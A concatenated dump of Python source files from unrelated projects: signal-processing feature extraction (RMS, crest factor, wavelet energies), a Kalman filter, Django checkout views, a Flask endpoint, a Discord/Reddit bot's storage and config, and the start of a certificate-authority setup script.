* **dtype:** (dtype, optional) The type of the returned array and of the accumulator in which the
elements are summed. The dtype of `s` is used by default unless `s` has an integer
dtype of less precision than the default platform integer. In that case, if `s` is signed
then the platform integer is used while if `s` is unsigned then an unsigned integer of the
same precision as the platform integer is used.
* **out:** (ndarray, optional) Alternative output array in which to place the result. It must have
the same shape as the expected output, but the type of the output values will be cast if necessary.
* **keepdims:** (bool, optional) If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option, the result will broadcast correctly
against the input array. If the default value is passed, then `keepdims` will not be passed through
to the `sum` method of sub-classes of `ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any exceptions will be raised.
* **initial:** (scalar, optional) Starting value for the sum.
**Returns**
* **RMS_along_axis:** (ndarray) An array with the same shape as `s`, with the specified
axis removed. If `s` is a 0-d array, or if `axis` is None, a scalar is returned.
If an output array is specified, a reference to `out` is returned.
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> feature_extraction.stats.rms(np.array([0.5, 1.5]))
1.118033988749895
>>> feature_extraction.stats.rms(np.array([0.5, 0.7, 0.2, 1.5]), dtype=np.int32)
0.7071067811865476
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]))
3.605551275463989
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]), axis=0)
array([0. , 3.60555128])
>>> feature_extraction.stats.rms(np.array([[0, 1], [0, 5]]), axis=1)
array([0.70710678, 3.53553391])
```
You can also start the sum with a value other than zero:
```python
>>> feature_extraction.stats.rms(np.array([2, 7, 10]), initial=5)
7.2571803523590805
```
"""
s = Utils.check_dataset_shape(s)
return (np.sum(
s ** 2,
axis=axis,
dtype=dtype,
out=out,
keepdims=keepdims,
initial=initial
) / s.shape[0]) ** 0.5
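# Illustrative sketch (not part of the original API): using the RMS as a simple
# vibration alarm trigger, as described in the docstring above.  The threshold
# below is a made-up number, not an actual ISO 2372 limit.
#
#     rms_value = feature_extraction.stats.rms(velocity_signal)
#     if rms_value > 4.5:  # hypothetical velocity-RMS alarm level
#         print("RMS alarm: possible fault detected")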
def peak_2_valley(self, s, axis=0):
r"""
Another important measurement of a signal, considering a semantically coherent sampling
interval, for instance a fixed-length interval or one period of a rotation, is the peak-to-valley
(PV) value which reflects the amplitude spread of a signal:
$PV=\frac{1}{2}\left(\max(s)\quad -\quad \min(s)\right)$
**Parameters**
* **s:** (2d array_like) Input signal.
* **axis:** (int) Axis along which the peak-to-valley value is computed. Default is 0.
**Returns**
* **peak_2_valley:** (ndarray) Peak-to-valley value along the given axis.
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.peak_2_valley(s)
array([3.34321422])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.peak_2_valley(s)
array([2.99293034, 3.34321422])
```
"""
s = Utils.check_dataset_shape(s)
return (np.max(s, axis=axis)-np.min(s, axis=axis)) / 2
def peak(self, s, ref=None, axis=0, rate=None, **kwargs):
r"""
If we consider only the maximum amplitude relative to zero, $s_{ref}=0$, or to a general reference
level $s_{ref}$, we get the peak value
$peak = \max\left(s_{i}-ref\right)$
Often the peak is used in conjunction with other statistical parameters, for instance the
peak-to-average rate
$\frac{\max\left(s_{i}-ref\right)}{\frac{1}{N}\sum_{i=0}^{N-1}s_{i}}$
or the peak-to-median rate.
**Parameters**
* **s:** (2d array_like) Input signal.
* **ref:** (float, optional) Reference level. If None, the first sample of the signal is used as reference.
* **axis:** (int) Axis along which the peak is computed. Default is 0.
* **rate:** (str, optional) If 'average' or 'median', the peak-to-average or peak-to-median rate is returned instead of the raw peak.
**Returns**
* **peak:** (ndarray) Peak value (or peak rate) along the given axis.
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.peak(s)
array([1.91382976])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.peak(s)
array([1.0232499 , 3.26594839])
```
"""
s = Utils.check_dataset_shape(s)
if ref is not None:
_peak = np.max(s - ref, axis=axis)
else:
_peak = np.max(s - s[0,:], axis=axis)
if rate is not None:
if rate.lower() == 'average':
return _peak / self.mean(s, **kwargs)
elif rate.lower() == 'median':
return _peak / self.median(s, **kwargs)
else:
return _peak
def crest_factor(self, s, **kwargs):
r"""
When we relate the peak value to the RMS of the signal, we obtain the crest factor:
$CF=\frac{peak}{RMS}$
which expresses the spikiness of the signal. The crest factor is also known as peak-to-average
ratio or peak-to-average power ratio and is used to characterize signals containing repetitive
impulses in addition to a lower level continuous signal. The modulus of the signal should be
used in the calculus.
**Parameters**
* **s:** (2d array_like) Input signal. Extra keyword arguments are forwarded to `peak` and `rms`.
**Returns**
* **crest_factor:** (ndarray) Ratio between the peak value and the RMS of the signal.
## Snippet code
```python
>>> from scipy.stats import norm
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> s = norm.rvs(size=1000, random_state=3)
>>> feature_extraction.stats.crest_factor(s)
array([1.89760521])
>>> s = norm.rvs(size=(1000,2), random_state=3)
>>> feature_extraction.stats.crest_factor(s)
array([0.71532677, 2.28313758])
```
"""
peak = self.peak(s, **kwargs)
rms = self.rms(s, **kwargs)
return peak / rms
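# Illustrative check (assumed values, not part of the original API): the crest
# factor relation CF = peak / RMS can be verified with plain NumPy for a toy
# signal and a zero reference level.
#
#     import numpy as np
#     s = np.array([0.0, 1.0, 0.0, 5.0])
#     rms = np.sqrt(np.mean(s ** 2))   # sqrt(26 / 4) ~= 2.5495
#     peak = np.max(s)                 # 5.0 relative to s_ref = 0
#     cf = peak / rms                  # ~= 1.9612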
# @set_to_methods(del_temp_attr)
class Wavelet:
r"""
A wavelet is a mathematical function used to divide a given function or continuous-time
signal into different scale components. Usually one can assign a frequency range to each
scale component. Each scale component can then be studied with a resolution that matches
its scale. A wavelet transform is the representation of a function by wavelets.
The wavelets are scaled and translated copies (known as "daughter wavelets") of a
finite-length or fast-decaying oscillating waveform (known as the "mother wavelet").
Wavelet transforms have advantages over traditional Fourier transforms for representing
functions that have discontinuities and sharp peaks, and for accurately deconstructing
and reconstructing finite, non-periodic and/or non-stationary signals.
"""
_instances = list()
@WaveletDeco.is_valid
@WaveletDeco.mode_is_valid
def wavedec(self, s, wavelet, mode='symmetric', level=None, axis=-1):
r"""
Multilevel 1D Discrete Wavelet Transform of signal $s$
**Parameters**
* **s:** (array_like) Input data
* **wavelet:** (Wavelet object or name string) Wavelet to use
* **mode:** (str) Signal extension mode.
* **level:** (int) Decomposition level (must be >= 0). If level is None (default)
then it will be calculated using the `dwt_max_level` function.
* **axis:** (int) Axis over which to compute the DWT. If not given, the last axis
is used.
**Returns**
* **[cA_n, cD_n, cD_n-1, ..., cD2, cD1]:** (list) Ordered list of coefficients arrays where
$n$ denotes the level of decomposition. The first element `(cA_n)` of the result is approximation
coefficients array and the following elements `[cD_n - cD1]` are details coefficients arrays.
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> coeffs = feature_extraction.freq.wavelet.wavedec([1,2,3,4,5,6,7,8], 'db1', level=2)
>>> cA2, cD2, cD1 = coeffs
>>> cD1
array([-0.70710678, -0.70710678, -0.70710678, -0.70710678])
>>> cD2
array([-2., -2.])
>>> cA2
array([ 5., 13.])
>>> s = np.array([[1,1], [2,2], [3,3], [4,4], [5, 5], [6, 6], [7, 7], [8, 8]])
>>> coeffs = feature_extraction.freq.wavelet.wavedec(s, 'db1', level=2, axis=0)
>>> cA2, cD2, cD1 = coeffs
>>> cD1
array([[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678],
[-0.70710678, -0.70710678]])
>>> cD2
array([[-2., -2.],
[-2., -2.]])
>>> cA2
array([[ 5., 5.],
[13., 13.]])
```
"""
coeffs = pywt.wavedec(s, wavelet, mode=mode, level=level, axis=axis)
return coeffs
def wave_energy(self, s, wavelet, mode='symmetric', level=None, axis=-1):
r"""
The energy of time-series data distributed in Approximate and Detailed coefficients
are calculated as follows:
$ED_{i}=\sum_{j=1}^{N}|D_{ij}|^2,\quad i={1,2,\cdots,level}$
$EA_{level}=\sum_{j=1}^{N}|A_{lj}|^2$
Where $ED_{i}$ represents energy in the $i^{th}$ detailed coefficient and $EA_{level}$
is the energy in the $level^{th}$ approximate coefficient respectively. Further, the
fraction of total signal energy present in the approximate and detailed components is
calculated which serves as a feature vector for every sensor.
**Parameters**
* **s:** (array_like) Input data
* **wavelet:** (Wavelet object or name string) Wavelet to use
* **mode:** (str) Signal extension mode.
* **level:** (int) Decomposition level (must be >= 0). If level is None (default)
then it will be calculated using the `dwt_max_level` function.
* **axis:** (int) Axis over which to compute the DWT. If not given, the last axis
is used.
**Returns**
* **[EA_n, ED_n, ED_n-1, ..., ED2, ED1]:** (list) Ordered list of energy arrays where
$n$ denotes the level of decomposition.
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAIFE
>>> feature_extraction = RackioAIFE()
>>> energies = feature_extraction.freq.wavelet.wave_energy([1,2,3,4,5,6,7,8], 'db1', level=2)
>>> eA2, eD2, eD1 = energies
>>> eD1
2.000000000000001
>>> eD2
8.000000000000004
>>> eA2
194.00000000000006
>>> s = np.array([[1,1], [2,2], [3,3], [4,4], [5, 5], [6, 6], [7, 7], [8, 8]])
>>> energies = feature_extraction.freq.wavelet.wave_energy(s, 'db1', level=2, axis=0)
>>> eA2, eD2, eD1 = energies
>>> eD1
array([2., 2.])
>>> eD2
array([8., 8.])
>>> eA2
array([194., 194.])
```
"""
energy = list()
# Wavelet decomposition
coeffs = self.wavedec(s, wavelet, mode=mode, level=level, axis=axis)
# Get approximation coefficients
approximation_coeff = coeffs.pop(0)
# Energy approximation computation
energy.append(np.sum(approximation_coeff ** 2, axis=axis))
# Energy detailed computation
for detailed_coeff in coeffs:
energy.append(np.sum(detailed_coeff ** 2, axis=axis))
return energy
def get_energies(
self,
s,
input_cols=None,
output_cols=None,
timesteps=10,
wavelet_type='db2',
wavelet_lvl=2,
axis=0,
slide=False
):
r"""
Computes wavelet energies over (optionally sliding) windows of `timesteps` samples of the signal `s`.
**Parameters**
* **s:** (pandas.DataFrame or 3d array) Input data.
* **input_cols:** (list) Columns of `s` to use when `s` is a DataFrame.
* **output_cols:** (list) Currently unused.
* **timesteps:** (int) Window length in samples.
* **wavelet_type:** (str) Wavelet to use, e.g. 'db2'.
* **wavelet_lvl:** (int) Decomposition level.
* **axis:** (int) Axis over which to compute the DWT.
* **slide:** (bool) If True, windows advance one sample at a time; otherwise they advance `timesteps` samples (non-overlapping).
**Returns**
* **energies:** (2d array) One row per window with the concatenated approximation and detail energies.
"""
self._s_ = s
self.wavelet_type = wavelet_type
self.wavelet_lvl = wavelet_lvl
self.axis = axis
self.result = list()
rows = s.shape[0]
if slide:
rows = range(0 , rows - timesteps)
else:
rows = range(0 , rows - timesteps, timesteps)
self.timesteps = timesteps
self.input_cols = input_cols
self.__get_energies(rows)
result = np.array(self.result)
return result
@ProgressBar(desc="Getting wavelet energies...", unit=" Sliding windows")
def __get_energies(self, row):
r"""
Computes and appends the wavelet energies for a single window starting at `row`.
"""
if isinstance(self._s_, pd.DataFrame):
data = self._s_.loc[row: row + self.timesteps, self.input_cols].values
else:
data = self._s_[row,:,:]
energies = self.wave_energy(
data,
self.wavelet_type,
level=self.wavelet_lvl,
axis=self.axis
)
energies = np.concatenate(list(energies))
self.result.append(list(energies))
return
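# Usage sketch for `get_energies` above (column names and sizes are hypothetical,
# not taken from the original project):
#
#     fe = RackioAIFE()
#     windows = fe.freq.wavelet.get_energies(
#         df,                      # pandas DataFrame with the raw signals
#         input_cols=['PT_01', 'PT_02'],
#         timesteps=100,           # samples per window
#         wavelet_type='db2',
#         wavelet_lvl=2,
#         axis=0,
#         slide=True)
#     # Each row holds (wavelet_lvl + 1) * len(input_cols) energy values.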
class FrequencyFeatures:
r"""
Frequency-domain feature extraction methods (wavelet decomposition and, eventually, the STFT).
"""
_instances = list()
def __init__(self):
r"""
Initializes the frequency-domain features with a `Wavelet` helper.
"""
self.wavelet = Wavelet()
def stft(self, s):
r"""
In construction...
The Short Time Fourier Transform (STFT for short) of a given frame $s\left(m,n\right)$
is a Fourier transform performed in successive frames:
$S\left(m,n\right)=\sum_{n}s\left(m,n\right)\cdot{e^{\frac{-j2\pi nk}{N}}}$
where $s\left(m,n\right)=s\left(n\right)w\left(n-mL\right)$ and $w\left(n\right)$ is a windowing
function of $N$ samples
**Parameters**
* **s:**
**Returns**
* **stft:**
"""
pass
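# The method above is still a stub.  A minimal sketch of the same idea using
# SciPy (an assumption; the class does not currently depend on scipy.signal):
#
#     from scipy.signal import stft
#     f, t, Zxx = stft(s, fs=1.0, window='hann', nperseg=256)
#     # |Zxx| holds the magnitude of S(m, n) for each frame m and frequency bin n.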
class RackioAIFE:
r"""
Rack Input/Output Artificial Intelligence Feature Extraction (RackioAIFE for short) is a class
that allows you to perform feature extraction for pattern recognition models.
Feature extraction transforms originally high-dimensional patterns into lower dimensional vectors
by capturing their essential characteristics. Various feature extraction techniques have been
proposed in the literature for different signal applications. In speech and speaker recognition
and in fault diagnosis, they are essentially based on Fourier transform, cepstral analysis, autoregressive
modeling, wavelet transform and statistical analysis.
"""
stats = StatisticalsFeatures()
freq = FrequencyFeatures()
if __name__=='__main__':
import doctest
doctest.testmod()
```
#### File: rackio_AI/preprocessing/kalman_filter.py
```python
class KalmanFilter:
"""
Class to filter data using a Kalman filter
**Attributes**
* **alpha:** (float) (default=1.0) Process noise added to the error estimate on each step.
* **beta:** (float) (default=0.0) Uncertainty in the measurement.
* **filtered_value:** (float) Current filtered value.
"""
def __init__(self):
"""
"""
self.alpha = 1.0
self.beta = 0.0
self.filtered_value = 0.0
self.posteri_error_estimate = 0.0
def set_init_value(self, value):
"""
Set init value for the Kalman filter
___
**Parameters**
* **:param value:** (float)
* **:return:**
None
___
## Snippet code
```python
>>> import numpy as np
>>> from rackio_AI import RackioAI
>>> preprocessing = RackioAI.get('Preprocessing', _type="Preprocessing")
>>> kf = preprocessing.kalman_filter # Kalman filter definition
>>> variable_to_filter = np.ones((10,1)) + np.random.random((10,1))
>>> kf.set_init_value(variable_to_filter[0])
```
"""
self.filtered_value = value
def __call__(self, value):
"""
**Parameters**
* **:param value:** (float) value to filter
:return:
See [This example](https://github.com/crivero7/RackioAI/blob/main/examples/example9.py) for a real example
```python
>>> import numpy as np
>>> from rackio_AI import RackioAI
>>> preprocessing = RackioAI.get("Preprocessing", _type="Preprocessing")
>>> kf = preprocessing.kalman_filter # Kalman filter definition
>>> kf.alpha = 0.001
>>> kf.beta = 0.2
>>> variable_to_filter = np.ones((10,1)) + np.random.random((10,1))
>>> filtered_variable = np.array([kf(value) for value in variable_to_filter]) # Applying Kalman filter
```
"""
# Prediction
f_value = self.filtered_value
priori_error_estimate = self.posteri_error_estimate + self.alpha
# Correction
blending_factor = priori_error_estimate / (priori_error_estimate + self.beta)
self.filtered_value = f_value + blending_factor * (value - f_value)
self.posteri_error_estimate = (1 - blending_factor) * priori_error_estimate
return self.filtered_value
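# Worked one-step example (illustrative numbers only): with alpha=0.001,
# beta=0.2, filtered_value=1.0 and posteri_error_estimate=0.0, an incoming
# measurement of 2.0 gives:
#   priori_error_estimate  = 0.0 + 0.001 = 0.001
#   blending_factor        = 0.001 / (0.001 + 0.2) ~= 0.00498
#   filtered_value         = 1.0 + 0.00498 * (2.0 - 1.0) ~= 1.00498
#   posteri_error_estimate ~= (1 - 0.00498) * 0.001 ~= 0.000995
# A small beta trusts the measurement more; a small alpha trusts the model more.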
```
#### File: readers/pkl/pkl_core.py
```python
import pandas as pd
from easy_deco.progress_bar import ProgressBar
from easy_deco.del_temp_attr import set_to_methods, del_temp_attr
import pickle
from random import shuffle
@set_to_methods(del_temp_attr)
class PKL:
"""
This reader allows you to read a DataFrame saved in pkl format faster
"""
_instances = list()
def __init__(self):
super(PKL, self).__init__()
def read(self, pathname: str, **kwargs):
"""
Read a DataFrame saved with RackioAI's save method as a pkl file
**Parameters**
* **:param pathname:** (str) Filename or directory
```python
>>> import os
>>> from rackio_AI import RackioAI, get_directory
>>> filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
```
"""
self._df_ = list()
self.__read(pathname, **kwargs)
if 'shuffle' in kwargs:
_shuffle = kwargs['shuffle']
if _shuffle:
shuffle(self._df_)
df = pd.concat(self._df_)
return df
@ProgressBar(desc="Reading .pkl files...", unit="file")
def __read(self, pathname, **pkl_options):
"""
Read (pkl) file into DataFrame.
"""
with open(pathname, 'rb') as f:
_df = pickle.load(f)
if 'remove_initial_points' in pkl_options:
_rip = pkl_options['remove_initial_points']
_df.drop(index=_df.iloc[0:_rip, :].index.tolist(), inplace=True)
self._df_.append(_df)
return
if __name__ == "__main__":
# import doctest
# doctest.testmod()
import os
from rackio_AI import RackioAI, get_directory
filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
df = RackioAI.load(filename)
```
#### File: RackioAI/rackio_AI/_temporal.py
```python
from easy_deco.del_temp_attr import del_temp_attr, set_to_methods
@set_to_methods(del_temp_attr)
class TemporalMeta:
"""
The Singleton class can be implemented in different ways in Python. Some
possible methods include: base class, decorator, metaclass. We will use the
metaclass because it is best suited for this purpose.
"""
_instances = list()
def __new__(cls):
inst = super(TemporalMeta, cls).__new__(cls)
cls._instances.append(inst)
return inst
```
|
{
"source": "JesusDelgadoPatlan/tiendaSpark",
"score": 2
}
|
#### File: checkout/views/__init__.py
```python
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from .discount import add_voucher_form, validate_voucher
from .shipping import (anonymous_user_shipping_address_view,
user_shipping_address_view)
from .summary import (
summary_with_shipping_view, anonymous_summary_without_shipping,
summary_without_shipping)
from .validators import (
validate_cart, validate_shipping_address,
validate_shipping_method, validate_is_shipping_required)
from ..core import load_checkout
from ..forms import ShippingMethodForm
from ...registration.forms import LoginForm
@load_checkout
@validate_cart
@validate_is_shipping_required
def index_view(request, checkout):
"""Redirect to the initial step of checkout."""
return redirect('checkout:shipping-address')
@load_checkout
@validate_voucher
@validate_cart
@validate_is_shipping_required
@add_voucher_form
def shipping_address_view(request, checkout):
"""Display the correct shipping address step."""
if request.user.is_authenticated:
return user_shipping_address_view(request, checkout)
return anonymous_user_shipping_address_view(request, checkout)
@load_checkout
@validate_voucher
@validate_cart
@validate_is_shipping_required
@validate_shipping_address
@add_voucher_form
def shipping_method_view(request, checkout):
"""Display the shipping method selection step."""
country_code = checkout.shipping_address.country.code
shipping_method_form = ShippingMethodForm(
country_code, request.POST or None,
initial={'method': checkout.shipping_method})
if shipping_method_form.is_valid():
checkout.shipping_method = shipping_method_form.cleaned_data['method']
return redirect('checkout:summary')
return TemplateResponse(
request, 'checkout/shipping_method.html',
context={
'shipping_method_form': shipping_method_form,
'checkout': checkout})
@load_checkout
@validate_voucher
@validate_cart
@add_voucher_form
def summary_view(request, checkout):
"""Display the correct order summary."""
if checkout.is_shipping_required:
view = validate_shipping_address(summary_with_shipping_view)
view = validate_shipping_method(view)
return view(request, checkout)
if request.user.is_authenticated:
return summary_without_shipping(request, checkout)
return anonymous_summary_without_shipping(request, checkout)
@load_checkout
@validate_cart
def login(request, checkout):
"""Allow the user to log in prior to checkout."""
if request.user.is_authenticated:
return redirect('checkout:index')
form = LoginForm()
return TemplateResponse(request, 'checkout/login.html', {'form': form})
```
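The views above redirect by URL name (`checkout:shipping-address`, `checkout:summary`, `checkout:index`). A hypothetical `urls.py` consistent with those names is sketched below; the actual paths, module layout and Django version in the project may differ.
```python
from django.urls import path

from . import views

app_name = 'checkout'

urlpatterns = [
    path('', views.index_view, name='index'),
    path('shipping-address/', views.shipping_address_view, name='shipping-address'),
    path('shipping-method/', views.shipping_method_view, name='shipping-method'),
    path('summary/', views.summary_view, name='summary'),
    path('login/', views.login, name='login'),
]
```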
|
{
"source": "jesusej/CarSimulator3D",
"score": 2
}
|
#### File: jesusej/CarSimulator3D/server.py
```python
from flask import Flask, render_template, request, jsonify
import json, logging, os, atexit
from micromodelo import createJson
app = Flask(__name__, static_url_path='')
# On IBM Cloud Cloud Foundry, get the port number from the environment variable PORT
# When running this app on the local machine, default the port to 8000
port = int(os.getenv('PORT', 8000))
@app.route('/')
def root():
return jsonify(createJson())
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=True)
```
|
{
"source": "Jesus-E-Rodriguez/DiscordRedditPoster",
"score": 3
}
|
#### File: DiscordRedditPoster/client/mixins.py
```python
import json
from typing import Any, Dict, List, Union, Generator, Optional, Callable
import asyncpraw
import asyncprawcore
from asyncpraw.models import ListingGenerator
from client.models import RedditHelper
class Storage:
"""Mixin for storing data."""
def __init__(self, filename: str = "data.json") -> None:
"""Initialize the mixin."""
self.filename = filename
def get(
self,
default: Optional[Dict[str, Any]] = None,
callback: Optional[Callable] = None,
) -> dict:
"""Retrieves data from the given filename as a serialized json object.
Or creates a file with the default if it doesn't exist.
"""
data = default or {}
try:
with open(self.filename, "r") as file:
data = json.load(file)
except (json.decoder.JSONDecodeError, FileNotFoundError):
self.set(data)
if callback:
callback()
return data
def set(self, data: Dict[str, Any], callback: Optional[Callable] = None) -> None:
"""Saves the given data to the given filename in json format."""
with open(self.filename, "w") as file:
json.dump(data, file)
if callback:
callback()
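# Usage sketch for the Storage mixin (the filename is hypothetical):
#
#     storage = Storage(filename="example.json")
#     storage.set({"greeting": "hello"})
#     storage.get()            # -> {"greeting": "hello"}
#     storage.get(default={})  # returns the stored data, falling back to {} only
#                              # when the file is missing or unreadable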
class Reddit:
"""Base mixin for reddit functionality."""
def __init__(
self,
client_id: str,
client_secret: str,
filename: str = "data.json",
callback: Optional[Callable] = None,
) -> None:
"""Initialize the mixin."""
self.storage = Storage(filename=filename)
self.subreddits = self.storage.get(
default={"subscribed": [], "banned": []}, callback=callback
)
self.request = asyncpraw.Reddit(
client_id=client_id,
client_secret=client_secret,
user_agent=f"DISCORD_BOT:{client_id}:1.0",
)
async def subreddit_exists(self, subreddit: str) -> bool:
"""Check if a subreddit exists."""
subreddit_exists = False
try:
_ = [
sub
async for sub in self.request.subreddits.search_by_name(
query=subreddit, exact=True
)
]
subreddit_exists = True
except (asyncprawcore.NotFound, asyncprawcore.exceptions.Redirect):
pass
return subreddit_exists
async def fetch(
self,
subreddit_or_redditor: str,
search_type: Optional[str] = "subreddit",
search_term: Optional[str] = None,
fetch: Optional[bool] = True,
sort: Optional[str] = None,
limit: Optional[int] = 1,
*args,
**kwargs,
) -> Union[ListingGenerator, List]:
"""Fetch posts from a subreddit or a redditor."""
if not await self.subreddit_exists(subreddit=subreddit_or_redditor):
search_type = "redditor"
if not search_term:
sort = "new"
results = []
try:
helper = RedditHelper(reddit=self.request, method=search_type)
results = await helper.filter(
query=subreddit_or_redditor,
search_term=search_term,
fetch=fetch,
sort=sort,
limit=limit,
*args,
**kwargs,
)
except asyncprawcore.exceptions.Redirect:
pass
return results
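# Usage sketch (asynchronous call; credentials, subreddit name and limit are
# placeholders, not values from the original project):
#
#     reddit = Reddit(client_id="...", client_secret="...")
#     posts = await reddit.fetch("python", search_term="asyncio", limit=5)
#     # Falls back to treating the query as a redditor when no such subreddit exists.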
def manage_subscription(
self,
channel_id: int,
subreddit: str,
subscribe: bool = True,
callback: Optional[Callable] = None,
) -> None:
"""Store the channel id and subreddit to subscribe to. Subscribes by default."""
subscription = {"channel_id": channel_id, "subreddit": subreddit}
if subscribe:
self.subreddits.setdefault("subscribed", []).append(subscription)
else:
try:
self.subreddits.get("subscribed", []).remove(subscription)
except ValueError:
pass
self.storage.set(self.subreddits, callback=callback)
def manage_moderation(
self,
subreddit: str,
ban: bool = True,
callback: Optional[Callable] = None,
) -> None:
"""Manages bans. Bans by default."""
if ban:
[
self.manage_subscription(**sub, subscribe=False)
for sub in self.subreddits.get("subscribed", [])
if sub.get("subreddit") == subreddit
]
self.subreddits.setdefault("banned", []).append(subreddit)
else:
try:
self.subreddits.get("banned", []).remove(subreddit)
except ValueError:
pass
self.storage.set(self.subreddits, callback=callback)
def subreddit_is_banned(self, subreddit: str) -> bool:
"""Checks if the given subreddit is banned."""
return subreddit in self.subreddits.get("banned", [])
def subreddit_is_subscribed(self, channel_id: str, subreddit: str) -> bool:
"""Checks if the given subreddit is subscribed."""
return any(
channel_id == sub.get("channel_id") and subreddit == sub.get("subreddit")
for sub in self.subreddits.get("subscribed", [])
)
def get_subscriptions(self) -> Generator:
"""Returns a generator with subscribed subreddits."""
return (sub.values() for sub in self.subreddits.get("subscribed", []))
```
#### File: Jesus-E-Rodriguez/DiscordRedditPoster/config.py
```python
import logging
import os
from logging.config import dictConfig
from dotenv import load_dotenv
from env import EnvMixin
load_dotenv()
ENVIRONMENT = os.environ.get("ENVIRONMENT", "development")
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
LOGFILENAME = os.getenv("LOGFILENAME", default="discord_bot")
dictConfig(
{
"version": 1,
"formatters": {
"default": {
"format": "[%(asctime)s] %(levelname)s in %(module)s: %(message)s",
}
},
"handlers": {
f"{LOGFILENAME}": {
"class": "logging.FileHandler",
"filename": os.path.join(BASE_DIR, f"logs/{LOGFILENAME}.log"),
"encoding": "utf-8",
"mode": "a",
"formatter": "default",
}
},
"root": {
"level": os.getenv("LOGLEVEL", default=logging.DEBUG),
"handlers": [f"{LOGFILENAME}"],
},
}
)
class BaseConfig(EnvMixin):
"""Base configuration"""
ENVIRONMENT: str = ENVIRONMENT
DEBUG: bool = False
TESTING: bool = False
DISCORD_BOT_TOKEN: str
REDDIT_CLIENT_ID: str
REDDIT_CLIENT_SECRET: str
DISCORD_BOT_ADVANCED_COMMANDS_ROLES: list
DISCORD_BOT_NORMAL_COMMANDS_ROLES: list
BASE_DIR: str = BASE_DIR
FILENAME: str = os.path.join(BASE_DIR, "data/subreddits.json")
LOGFILENAME: str = LOGFILENAME
class DevelopmentConfig(BaseConfig):
"""Development configuration."""
DEBUG: bool = True
TESTING: bool = True
class ProductionConfig(BaseConfig):
"""Production configuration."""
def get_config(env: str) -> BaseConfig:
"""Get configuration based on environment."""
if env.lower() == "development":
return DevelopmentConfig()
elif env.lower() == "production":
return ProductionConfig()
else:
raise ValueError(f"Invalid environment: {env}")
```
|
{
"source": "jesusfer/webca",
"score": 2
}
|
#### File: webca/setup/setup.py
```python
import getpass
import io
import json
import os
import re
import sys
BASE_DIR = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.path.pardir))
sys.path.append(BASE_DIR)
os.environ["DJANGO_SETTINGS_MODULE"] = "webca.ca_admin.settings"
from webca.certstore import CertStore
from webca.config import constants as p
from webca.config import new_crl_config
from webca.crypto import certs
from webca.crypto import constants as c
from webca.crypto.utils import int_to_hex, new_serial
from webca.crypto.extensions import json_to_extension
from webca.utils import dict_as_tuples
from webca.utils.iso_3166 import ISO_3166_1_ALPHA2_COUNTRY_CODES as iso3166
MSG_DB = """\nA database is needed to store templates, user requests and issued certificates."""
MSG_DB_CERTS = """\nAnother database is needed to store the CA certificates.
It should be different from the web database."""
def setup():
"""Orchestrate the setup process."""
print('\n*** Setup of database servers ***')
config = {}
config.update(get_database(MSG_DB, 'web_'))
config.update(get_database(MSG_DB_CERTS, 'certs_'))
hosts = get_host_names()
print("""\nReview the options above, they are needed to continue.\n""")
option = input('Continue? (Y/n)').lower()
if option == 'n':
sys.exit(-1)
create_settings(config, hosts)
init_django()
print('\n*** Setup of CA certificates ***')
setup_certificates()
setup_crl_publishing()
setup_user_groups()
setup_super_user()
install_templates()
collect_static()
review_secret_key()
setup_email()
"""
FUTURE: Just in case we wanted to filter the options
with the installed modules:
django.db.backends.sqlite3
django.db.backends.postgresql: psycopg2
django.db.backends.mysql: mysqlclient
django.db.backends.oracle: cx_Oracle
"""
def get_database(reason, prefix):
"""Get database settings."""
print(reason)
print("""
Choose an engine:
1. SQLite3
2. PostgreSQL
3. MySQL
4. Oracle
""")
engine = input('Engine: ')
server = input('DB Server: ')
name = input('DB Name: ')
user = input('User: ')
password = <PASSWORD>()
print('To use the default port, leave blank.')
port = input('Port: ')
config = {
prefix+'engine': _get_engine(engine),
prefix+'server': server,
prefix+'name': name,
prefix+'user': user,
prefix+'password': password,
prefix+'port': port,
}
return config
def _get_engine(number):
if not isinstance(number, int):
number = int(number)
if number == 1:
return 'django.db.backends.sqlite3'
elif number == 2:
return 'django.db.backends.postgresql'
elif number == 3:
return 'django.db.backends.mysql'
elif number == 4:
return 'django.db.backends.oracle'
DB_DEFAULT = """DATABASES = {
'default': {
'ENGINE': '%(engine)s',
'NAME': '%(name)s',
'USER': '%(user)s',
'PASSWORD': <PASSWORD>',
'HOST': '%(server)s',
'PORT': '%(port)s',
}
}
"""
DB_CERTS = """DATABASES = {}
DATABASES['certstore_db'] = {
'ENGINE': '%(engine)s',
'NAME': '%(name)s',
'USER': '%(user)s',
'PASSWORD': <PASSWORD>',
'HOST': '%(server)s',
